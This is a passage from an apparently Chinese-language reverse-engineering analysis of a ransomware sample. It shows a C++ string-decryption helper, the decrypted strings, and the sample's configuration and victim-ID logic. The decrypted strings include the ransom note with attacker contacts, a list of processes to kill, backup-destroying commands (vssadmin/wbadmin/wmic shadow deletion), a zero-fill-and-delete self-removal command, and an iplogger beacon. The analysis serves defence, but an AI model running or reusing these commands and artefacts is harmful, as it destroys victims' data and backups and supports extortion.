38, 67, 96, 133, 166, 246, 58, 46, 252, 232, 186, 151, 165, 107, 168, 181, 118, 26, 43, 182, 156, 129, 90, 92, 108, 73, 233, 180, 118, 255, 197, 32, 98, 167, 93, 69, 187, 34, 146, 161, 43, 249, 186, 202, 174, 38, 150, 183, 70, 226, 217, 248, 128, 66, 142, 106, 66, 56, 156, 207, 58, 253, 113, 220, 193, 92, 185, 32, 146, 48, 39, 94, 35, 66, 157, 6, 216, 37, 150, 236, 152, 104, 217, 249, 249},
        {246, 90, 179, 234, 48, 142, 1, 26, 36, 136, 217, 47, 237, 39, 148, 183, 90, 52, 241, 83, 206, 43, 5, 13, 203, 219, 225, 101, 6, 190, 3, 70, 84, 81, 155, 234, 52, 88, 75, 21, 60, 165, 20, 36, 118, 21, 128, 11, 126, 233, 21, 107, 160, 49, 220, 133, 107, 16, 147, 19, 163, 9, 158, 246, 46, 40, 42, 123, 63, 57, 219, 105, 105, 92, 145, 51, 2, 188, 172, 174, 31, 181, 110, 138, 233, 29, 63, 169, 66, 180, 179, 227, 49, 90, 49, 115},
        {172, 40, 133, 17, 93, 47, 207, 47, 88, 33, 169, 159, 208, 62, 66, 62, 138, 133, 43, 164, 180, 21, 35, 65, 138, 194, 105, 63, 72, 27, 215, 62, 187, 171, 29, 51, 48, 168, 242, 106, 199, 183, 238, 170, 45, 180, 253, 252, 200, 62, 150, 176, 114, 101, 182, 251, 190, 225, 197, 194, 102, 124, 222, 229, 165, 1, 90, 252, 242, 189, 16, 147, 114, 225, 110, 170, 27, 76, 242, 52, 201, 124, 37, 0, 132, 200, 62, 116, 26, 164, 143, 155, 23, 73, 214, 204, 33, 242, 15, 0, 220, 65, 0, 11, 96, 186, 104, 76, 229, 33, 215, 236, 190, 198, 62, 242, 187, 204, 202, 86, 32, 23, 206, 210, 107, 27, 174, 164, 116, 28, 92, 74, 132, 63, 235, 127, 236, 192, 119, 239, 162, 43, 6, 227, 79, 229, 162, 227, 200, 226, 91, 25, 41, 201, 4, 132, 144, 47, 47, 13},
        {11, 196, 195, 32, 5, 100, 134, 104, 84, 247, 183, 154, 223, 203, 231, 212, 249, 49, 234, 142, 101, 230, 90, 161, 74, 23, 113, 45, 103, 154, 194, 223},
        {225, 27, 175, 232, 18, 37, 161, 122, 76, 83, 88, 208, 28, 104, 151, 150, 163, 88, 178, 12, 210, 196, 186, 7, 100, 84, 199, 125, 35, 111, 137, 22},
        {99, 192, 5, 231, 196, 191, 149, 122, 168, 127, 92, 174, 236, 236, 214, 170, 99, 242, 62, 64, 27, 193, 183, 109, 195, 35, 151, 195, 241, 61, 229, 139},
        {220, 25, 66, 162, 171, 84, 248, 250, 166, 89, 113, 126, 137, 254, 36, 236, 12, 162, 255, 132, 147, 174, 234, 208, 85, 214, 140, 58, 18, 110, 38, 19},
        {225, 122, 168, 104, 101, 254, 28, 98, 196, 73, 255, 234, 209, 50, 85, 59, 215, 4, 226, 206, 4, 104, 132, 56, 18, 67, 88, 151, 197, 2, 113, 127, 69, 221, 16, 243, 76, 58, 31, 9, 95, 116, 231, 41, 124, 176, 43, 219, 80, 250, 227, 102, 37, 99, 70, 154, 210, 218, 203, 39, 185, 172, 105, 226, 61, 186, 80, 177, 99, 220, 135, 98, 81, 16, 9, 92, 31, 164, 131, 178, 171, 9, 183, 126, 180, 152, 146, 86, 97, 108, 146, 58, 5, 97, 94, 71, 250, 186, 95, 57, 197, 129, 20, 161, 241, 231, 58, 137, 100, 166, 203, 100, 219, 53, 174, 245, 209, 156, 214, 41, 79, 235, 133, 119, 11, 253, 45, 195},
        {63, 1, 129, 0, 184, 38, 2, 45, 48, 182, 29, 246, 225, 57, 153, 32, 252, 56, 102, 191, 106, 27, 20, 53, 211, 92, 58, 203, 65, 57, 143, 240},
        {71, 167, 222, 114, 175, 188, 242, 180, 12, 127, 185, 48, 145, 172, 16, 227, 102, 70, 142, 174, 3, 180, 205, 4, 190, 126, 219, 132, 156, 135, 215, 63, 162, 33, 205, 197, 253, 115, 81, 242, 236, 110, 69, 130, 119, 169, 19, 213, 221, 23, 80, 9, 244, 210, 120, 198, 148, 249, 103, 32, 23, 37, 191, 165, 141, 250, 145, 222, 137, 45, 185, 181, 239, 28, 33, 73, 121, 36, 92, 88, 37, 59, 76, 103, 69, 55, 3, 44, 90, 106, 171, 241, 177, 20, 39, 193},
        {71, 222, 90, 85, 178, 32, 186, 251, 190, 85, 181, 183, 104, 108, 40, 65, 9, 60, 190, 160, 123, 93, 92, 3, 123, 136, 133, 229, 80, 51, 62, 238},
        {236, 8, 245, 211, 134, 204, 47, 173, 97, 61, 239, 77, 34, 14, 198, 120, 44, 109, 241, 215, 133, 77, 145, 142, 6, 168, 90, 21, 254, 249, 26, 218},
        {59, 87, 121, 19, 80, 78, 243, 5, 97, 202, 60, 179, 250, 199, 105, 178, 26, 149, 210, 101, 6, 161, 215, 103, 120, 178, 93, 99, 209, 150, 136, 181, 19, 242, 57, 147, 253, 219, 122, 48, 59, 111, 51, 2, 131, 25, 90, 221, 111, 228, 223, 145, 201, 41, 34, 169, 39, 109, 145, 177, 129, 157, 11, 57, 174, 161, 95, 41, 6, 105, 156, 0, 29, 96, 194, 19, 20, 133, 81, 240, 186, 84, 155, 76, 84, 15, 226, 230, 151, 252, 96, 176, 156, 202, 74, 193, 228, 6, 61, 205, 55, 15, 199, 68, 227, 218, 250, 7, 139, 43, 159, 42, 239, 54, 176, 28, 102, 27, 206, 71, 204, 171, 71, 249, 254, 51, 52, 178, 173, 226, 162, 107, 80, 186, 148, 255, 43, 144, 102, 168, 28, 153, 205, 204, 117, 93, 42, 228, 229, 147, 173, 67, 82, 33, 124, 67, 25, 177, 110, 209, 20, 90, 128, 2, 103, 133, 187, 109, 240, 154, 49, 65, 213, 38, 150, 74, 240, 209, 21, 167, 89, 72, 177, 179, 135, 111, 54, 145, 71, 70, 94, 119},
        {91, 47, 23, 232, 198, 63, 14, 123, 10, 15, 137, 32, 228, 93, 19, 41, 157, 82, 6, 83, 50, 236, 50, 57, 149, 66, 140, 61, 76, 155, 176, 70, 93, 84, 127, 86, 142, 185, 211, 80, 34, 97, 95, 238, 38, 223, 43, 52, 27, 235, 20, 42, 116, 51, 52, 165, 98, 254, 148, 221, 125, 233, 64, 164, 154, 182, 24, 104, 74, 145, 234, 27, 239, 233, 45, 188, 118, 23, 251, 127, 57, 233, 46, 180, 212, 197, 177, 74, 201, 132, 230, 34, 9, 28, 2, 234},
        {82, 95, 95, 51, 123, 134, 16, 124, 201, 95, 89, 140, 151, 210, 135, 22, 9, 120, 72, 172, 144, 146, 118, 135, 251, 84, 81, 164, 2, 201, 90, 66, 219, 55, 201, 185, 209, 227, 138, 167, 128, 215, 59, 170, 115, 144, 227, 74, 207, 142, 89, 180, 233, 20, 11, 202, 12, 33, 100, 0, 182, 189, 235, 0}
    };

    for (int i = 0; i < cipher_list.size(); i++)
    {
        if (!CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey)) {
            std::cerr << "CryptImportKey failed: " << GetLastError() << std::endl;
            if (hProv) CryptReleaseContext(hProv, 0);
            return 1;
        }
        DWORD dataLen = (DWORD)cipher_list[i].size();
        if (!CryptDecrypt(hKey, 0, 0, 0, cipher_list[i].data(), &dataLen)) {
            std::cerr << "CryptDecrypt failed: " << GetLastError() << std::endl;
            CryptDestroyKey(hKey);
            CryptReleaseContext(hProv, 0);
            return 1;
        }
        cipher_list[i].resize(dataLen);
        std::cout << "Sign: " << sign_list[i] << std::endl;
        //std::cout << "明文: " << cipher_list[i].data() << std::endl;
        std::cout << "Data ";
        PrintHex(cipher_list[i]);
        std::cout << "------------------------------" << std::endl;
    }
    CryptDestroyKey(hKey);
    CryptReleaseContext(hProv, 0);
    return 0;
}

  这里得到的结果还是不太好看,就又拿python又处理了一下,结果如下,后续就可以根据标志来进行查表,可以快速的了解到解密的字符。

4.1.4.2 解密的字符串

标志:  0x0
解密字符串:SRC
解密HEX: 5300520043000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1
解密字符串:chewbacca@cock.li
解密HEX: 630068006500770062006100630063006100400063006f0063006b002e006c006900000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x4
解密字符串:boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;+README-WARNING+.txt;desktop.ini;
解密HEX: 62006f006f0074002e0069006e0069003b0062006f006f00740066006f006e0074002e00620069006e003b006e0074006c00640072003b006e0074006400650074006500630074002e0063006f006d003b0069006f002e007300790073003b002b0052004500410044004d0045002d005700410052004e0049004e0047002b002e007400780074003b006400650073006b0074006f0070002e0069006e0069003b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x5
解密字符串:sqlbrowser.exe;sqlwriter.exe;sqlservr.exe;msmdsrv.exe;MsDtsSrvr.exe;sqlceip.exe;fdlauncher.exe;Ssms.exe;sqlagent.exe;fdhost.exe;ReportingServicesService.exe;msftesql.exe;pg_ctl.exe;postgres.exe;UniFi.exe;armsvc.exe;IntelCpHDCPSvc.exe;OfficeClickToRun.exe;DellOSDService.exe;DymoPnpService.exe;Agent.exe;FJTWMKSV.exe;IPROSetMonitor.exe;IRMTService.exe;MBCloudEA.exe;QBCFMonitorService.exe;QBIDPService.exe;RstMwService.exe;TeamViewer_Service.exe;dasHost.exe;IntelCpHeciSvc.exe;RAVBg64.exe;vds.exe;unsecapp.exe;TodoBackupService.exe;MediaButtons.exe;IAStorDataMgrSvc.exe;jhi_service.exe;LMS.exe;DDVDataCollector.exe;DDVCollectorSvcApi.exe;TeamViewer.exe;tv_w32.exe;tv_x64.exe;Microsoft.Photos.exe;MicrosoftEdge.exe;ApplicationFrameHost.exe;browser_broker.exe;MicrosoftEdgeSH.exe;MicrosoftEdgeCP.exe;RtkNGUI64.exe;WavesSvc64.exe;OneDrive.exe;DYMO.DLS.Printing.Host.exe;FtLnSOP.exe;FjtwMkup.exe;FTPWREVT.exe;FTErGuid.exe;qbupdate.exe;QBWebConnector.exe;ShellExperienceHost.exe;RuntimeBroker.exe;IAStorIcon.exe;PrivacyIconClient.exe;SupportAssistAgent.exe;SecurityHealthService.exe;taskhostw.exe;taskhosta.exe;wijca.exe;ktfwswe.exe;HeciServer.exe;mdm.exe;ULCDRSvr.exe;WLIDSVC.EXE;WLIDSVCM.EXE;GoogleCrashHandler.exe;GoogleCrashHandler64.exe;RAVCpl64.exe;igfxtray.exe;hkcmd.exe;igfxpers.exe;PsiService_2.exe;UNS.exe;taskeng.exe;AdobeARM.exe;LenovoReg.exe;dwm.exe;wuauclt.exe;avp.exe;FBService.exe;LBAEvent.exe;PDFProFiltSrvPP.exe;avpsus.exe;klnagent.exe;vapm.exe;ScanToPCActivationApp.exe;BrStMonW.exe;BrCtrlCntr.exe;concentr.exe;redirector.exe;BrccMCtl.exe;BrYNSvc.exe;Receiver.exe;BrCcUxSys.exe;LSCNotify.exe;SelfServicePlugin.exe;wfcrun32.exe;HPNETW~1.EXE;HPScan.exe;taskhost.exe;Teams.exe;AuthManSvr.exe;WLXPhotoGallery.exe;outlook.exe;prevhost.exe;excel.exe;chrome.exe;AcroRd32.exe;RdrCEF.exe;vssadmin.exe;WmiPrvSE.exe;oracle.exe;ocssd.exe;dbsnmp.exe;synctime.exe;agntsrvc.exe;mydesktopqos.exe;isqlplussvc.exe;xfssvccon.exe;mydesktopservice.exe;ocautoupds.exe;encsvc.exe;firefoxconfig.exe;tbirdconfig.exe;ocomm.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;dbeng50.exe;sqbcoreservice.exe;infopath.exe;msaccess.exe;mspub.exe;onenote.exe;powerpnt.exe;steam.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;winword.exe;wordpad.exe;
解密HEX: 
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x6
解密字符串:+README-WARNING+.txt
解密HEX: 2b0052004500410044004d0045002d005700410052004e0049004e0047002b002e00740078007400000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x7
解密字符串:YOUR_FILES_ARE_ENCRYPTED
解密HEX: 59004f00550052005f00460049004c00450053005f004100520045005f0045004e00430052005900500054004500440000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x8
解密字符串:::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: chewbacca@cock.li
Or you can contact us via TOX: ADA6E26332F26451E45768179C771CA87A7F0F4E234DA8D882888F505494925DCF274A3EA555
You don't know about TOX? Go to https://tox.chat

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don�t want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.



:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

解密HEX: 3a3a3a204772656574696e6773203a3a3a0d0a0d0a4c6974746c65204641513a0d0a0d0a2e312e200d0a513a2057686174732048617070656e3f0d0a413a20596f75722066696c65732068617665206265656e20656e637279707465642e205468652066696c652073747275637475726520776173206e6f742064616d616765642c207765206469642065766572797468696e6720706f737369626c6520736f2074686174207468697320636f756c64206e6f742068617070656e2e0d0a0d0a2e322e200d0a513a20486f7720746f207265636f7665722066696c65733f0d0a413a20496620796f75207769736820746f206465637279707420796f75722066696c657320796f752077696c6c206e65656420746f207061792075732e0d0a0d0a2e332e200d0a513a20576861742061626f75742067756172616e746565733f0d0a413a20497473206a757374206120627573696e6573732e205765206162736f6c7574656c7920646f206e6f7420636172652061626f757420796f7520616e6420796f7572206465616c732c206578636570742067657474696e672062656e65666974732e20496620776520646f206e6f7420646f206f757220776f726b20616e64206c696162696c6974696573202d206e6f626f64792077696c6c20636f6f70657261746520776974682075732e20497473206e6f7420696e206f757220696e746572657374732e0d0a546f20636865636b20746865206162696c697479206f662072657475726e696e672066696c65732c20796f752063616e2073656e6420746f20757320616e7920322066696c657320776974682053494d504c4520657874656e73696f6e73286a70672c786c732c646f632c206574632e2e2e206e6f7420646174616261736573212920616e64206c6f772073697a6573286d61782031206d62292c2077652077696c6c2064656372797074207468656d20616e642073656e64206261636b20746f20796f752e2054686174206973206f75722067756172616e7465652e0d0a0d0a2e342e0d0a513a20486f7720746f20636f6e74616374207769746820796f753f0d0a413a20596f752063616e20777269746520757320746f206f7572206d61696c626f783a2063686577626163636140636f636b2e6c690d0a4f7220796f752063616e20636f6e746163742075732076696120544f583a20414441364532363333324632363435314534353736383137394337373143413837413746304634453233344441384438383238383846353035343934393235444346323734413345413535350d0a596f7520646f6e2774206b6e6f772061626f757420544f583f20476f20746f2068747470733a2f2f746f782e636861740d0a0d0a2e352e0d0a513a20486f772077696c6c207468652064656372797074696f6e2070726f636573732070726f63656564206166746572207061796d656e743f0d0a413a204166746572207061796d656e742077652077696c6c2073656e6420746f20796f75206f7572207363616e6e65722d6465636f6465722070726f6772616d20616e642064657461696c656420696e737472756374696f6e7320666f72207573652e205769746820746869732070726f6772616d20796f752077696c6c2062652061626c6520746f206465637279707420616c6c20796f757220656e637279707465642066696c65732e0d0a0d0a2e362e0d0a513a204966204920646f6e92742077616e7420746f20706179206261642070656f706c65206c696b6520796f753f0d0a413a20496620796f752077696c6c206e6f7420636f6f7065726174652077697468206f75722073657276696365202d20666f722075732c2069747320646f6573206e6f74206d61747465722e2042757420796f752077696c6c206c6f736520796f75722074696d6520616e6420646174612c206361757365206f6e6c792077652068617665207468652070726976617465206b65792e20496e207072616374696365202d2074696d65206973206d756368206d6f72652076616c7561626c65207468616e206d6f6e65792e0d0a0d0a0d0a0d0a3a3a3a4245574152453a3a3a0d0a444f4e27542074727920746f206368616e676520656e637279707465642066696c657320627920796f757273656c6621200d0a496620796f752077696c6c2074727920746f2075736520616e7920746869726420706172747920736f66747761726520666f7220726573746f72696e6720796f75722064617461206f7220616e7469766972757320736f6c7574696f6e73202d20706c65617365206d616b652061206261636b757020666f7220616c6c20656e637279707465642066696c6573210d0a416e79206368616e67657320696e20656e637279707465642066696c6573206d617920656e7461696c2064616d616765206f66207468652070726976617465206b657920616e642c20617320726573756c742c20746865206c6f737320616c6c20646174612e0d0a000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x9
解密字符串:vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete
exit

解密HEX: 76737361646d696e2064656c65746520736861646f7773202f616c6c202f71756965740a776261646d696e2064656c65746520636174616c6f67202d71756965740a776d696320736861646f77636f70792064656c6574650a657869740a0000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0xa
解密字符串:�RSA15b+ϼ�O�Y��\�R��u\        �t\���������SE���{�m\���愅�YR�3\�l�B�4Z��d���Ӗ\�eKBW�"i�        �hi#        �<��O��1$�o�P*���+�PNc�X�
解密HEX: 0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0xc
解密字符串:n�z�
解密HEX: 6edc7a8e00000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0xe
解密字符串:
解密HEX: 0000040000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0xf
解密字符串:
解密HEX: 0000100000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x10
解密字符串:SOFTWARE\Microsoft\Windows NT\CurrentVersion
解密HEX: 534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e0000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x11
解密字符串:ProductId
解密HEX: 50726f6475637449640000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x12
解密字符串:\\?\
解密HEX: 5c005c003f005c00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x13
解密字符串:waiting for network...
解密HEX: 770061006900740069006e006700200066006f00720020006e006500740077006f0072006b002e002e002e000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x14
解密字符串:runas
解密HEX: 720075006e006100730000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x16
解密字符串:SystemDrive
解密HEX: 530079007300740065006d004400720069007600650000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x17
解密字符串:ComSpec
解密HEX: 43006f006d005300700065006300000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x18
解密字符串:.[%08X].[%s].%s
解密HEX: 2e005b0025003000380058005d002e005b00250073005d002e00250073000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x19
解密字符串:X:\ProgramData\microsoft\windows\caches
解密HEX: 58003a005c00500072006f006700720061006d0044006100740061005c006d006900630072006f0073006f00660074005c00770069006e0064006f00770073005c00630061006300680065007300000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1a
解密字符串:Kernel32.dll;Wow64DisableWow64FsRedirection;Wow64RevertWow64FsRedirection;Advapi32.dll;CreateProcessWithTokenW;
解密HEX: 4b65726e656c33322e646c6c3b576f77363444697361626c65576f77363446735265646972656374696f6e3b576f773634526576657274576f77363446735265646972656374696f6e3b41647661706933322e646c6c3b43726561746550726f6365737357697468546f6b656e573b0000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1b
解密字符串:exe;dll;
解密HEX: 6500780065003b0064006c006c003b0000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1e
解密字符串:finished
解密HEX: 66696e6973686564000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1f
解密字符串:open
解密HEX: 6f00700065006e00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x20
解密字符串:admin
解密HEX: 610064006d0069006e0000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x21
解密字符串:not admin
解密HEX: 6e006f0074002000610064006d0069006e000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x22
解密字符串:1. ID: %08X
2. %s

解密HEX: 31002e002000490044003a00200025003000380058000d000a0032002e002000250073000d000a00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x23
解密字符串:%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%

解密HEX: 250073002000280025003000380058002900250063002000250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f00250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f0025007500250025000d000a0000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x24
解密字符串:3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%

解密HEX: 33002e00200054006f00740061006c003a002000250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f00250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f0025007500250025000d000a000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x25
解密字符串:X:\Users\All Users\Microsoft\Windows\Caches
解密HEX: 58003a005c00550073006500720073005c0041006c006c002000550073006500720073005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c0043006100630068006500730000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x26
解密字符串:ntdll.dll;NtQueryObject;NtQuerySystemInformation;RtlGetVersion;Kernel32.dll;GetFinalPathNameByHandleW;QueryFullProcessImageNameW;
解密HEX: 6e74646c6c2e646c6c3b4e7451756572794f626a6563743b4e74517565727953797374656d496e666f726d6174696f6e3b52746c47657456657273696f6e3b4b65726e656c33322e646c6c3b47657446696e616c506174684e616d65427948616e646c65573b517565727946756c6c50726f63657373496d6167654e616d65573b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x27
解密字符串:chrome;
解密HEX: 6300680072006f006d0065003b00000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x28
解密字符串:Users\Public;
解密HEX: 550073006500720073005c005000750062006c00690063003b00000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x29
解密字符串:iplogger.com
解密HEX: 69706c6f676765722e636f6d0000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2a
解密字符串:/1JfuR4
解密HEX: 2f314a6675523400000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2b
解密字符串:wininet.dll;HttpOpenRequestA;HttpSendRequestA;InternetOpenA;InternetCloseHandle;InternetConnectA;
解密HEX: 77696e696e65742e646c6c3b487474704f70656e52657175657374413b4874747053656e6452657175657374413b496e7465726e65744f70656e413b496e7465726e6574436c6f736548616e646c653b496e7465726e6574436f6e6e656374413b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2c
解密字符串:%08X;%I64d.%02I64d
解密HEX: 253038583b25493634642e253032493634640000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x33
解密字符串:windows;winnt;\system32;\regedit.exe;
解密HEX: 770069006e0064006f00770073003b00770069006e006e0074003b005c00730079007300740065006d00330032003b005c0072006500670065006400690074002e006500780065003b0000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x36
解密字符串:�.Y!
解密HEX: f32e592100000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x37
解密字符串:�!@]
解密HEX: dc21405d00000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x38
解密字符串:%s /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "%s" & del /q /f "%s"
解密HEX: 2500730020002f0063002000700069006e006700200031002e0031002e0031002e00310020002d006e0020003500200026002000660073007500740069006c002000660069006c00650020007300650074005a00650072006f00440061007400610020006f00660066007300650074003d00300020006c0065006e006700740068003d0031003300310030003700320020002200250073002200200026002000640065006c0020002f00710020002f0066002000220025007300220000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x39
解密字符串:\Microsoft\Windows\Network Shortcuts
解密HEX: 5c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c004e006500740077006f0072006b002000530068006f00720074006300750074007300000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x3a
解密字符串:Your files were encrypted!
Please contact us for decryption.
解密HEX: 596f75722066696c6573207765726520656e63727970746564210a506c6561736520636f6e7461637420757320666f722064656372797074696f6e2e00000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4.1.5 配置初始化(sub_4068B0函数)

  这里可以看到首先调用了sub_402680函数,然后又调用了sub_407B10函数来实现的对当前系统目录和当前运行程序的路径以及一些系统的特征文件夹进行获取。

  进入到sub_402680函数可以看到**,主要就是调用了CryptAcquireContextW函数来实现对加密对象的初始化,这里依旧是和字符串解密函数用的是一样的加密类型,都是PROV_RSA_AES类型**(0x18),不知道什么类型的,可以看下图:

  接着就是将0x41f000地址处的加密字符串数据赋值到a1+8结构的位置,然后将解密标志为0xa的解密字符串给到a1+36结构的位置(这里0xa标志所解密的字符串既是所有后续所用的解密字符的密文,与后续的a有所区别)。大致了解到,该函数主要就是实现了对字符串解密结构的初始化

  在完成了字符串解密的初始化以后,接着的就是调用sub_407B10函数来完成其他所需配置变量的初始化,进入到sub_407B10函数可以看到。

  首先通过GetSystemWindowsDirectoryW函数实现了一下对C:/Windows路径的获取

  调用GetModuleFileNameW函数实现对自身路径的获取

  调用SHGetSpecialFolderPathW函数实现对C:\ProgramDataC:\Users\Admin\Desktop路径的获取

  在完成了对数据的获取后,将要实现对字符串的解密然后初始化全局变量等

  最后就是以分号分片该解密字符串,进行模块的加载。

Kernel32.dll;Wow64DisableWow64FsRedirection;Wow64RevertWow64FsRedirection;Advapi32.dll;CreateProcessWithTokenW;

4.1.6 初始化窗口程序内容(sub_406D70函数)

  这里在分析之前,先对可视化的控件的ID做一下分析,以便于后续的分析,后续中的描述也会根据ID+控件类型来进行描述。

  因为是纯Windows编写的GUI程序,这里可以找到DialogBoxParamW函数,直接分析其回调DialogFunc即可

  进入到DialogFunc函数可以看到,其中a2为消息类型,其中有对窗口初始化、按钮点击、窗口关闭等。

  这里先从a2 == 0x110,既WM_INITDIALOG初始化对话框的事件开始分析,首先主要就是初始化1005编辑框中的ID和鉴权的内容,然后将其设置到其中。这里可以看到,ID部分的生成主要是由get_ID(sub_408370)这个函数生成的。

  进入到sub_408370这个函数可以看到,先解密了一下所需字符串,然后读取了SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId的值,并且将其给到Data。

  通过调用get_C_Volume_ID(sub_407C90)函数获取了一下C盘的卷序列号

  进入get_C_Volume_ID函数可以看到,先解密字符串SystemDrive,然后获取了环境变量SystemDrive的值为**C,接着调用GetVolumeInformationW**函数获取该磁盘的卷序列号。

  之后就是将序列号以“-%08x”的格式,拼接到产品ID的后面,再将其完整内容进行CRC32的计算,并返回。由此,该病毒的ID就生成了。

  这里可以写个脚本计算一下,发现完全对的上。

import binascii
cipher1 = '00331-10000-00001-AA161-F8A08166'
print hex(binascii.crc32(cipher1)&0xffffffff)

  完成了产品的ID的计算后,将进行编辑框内容的格式化,这里主要调用了format_ID_admin(sub_403660)函数实现

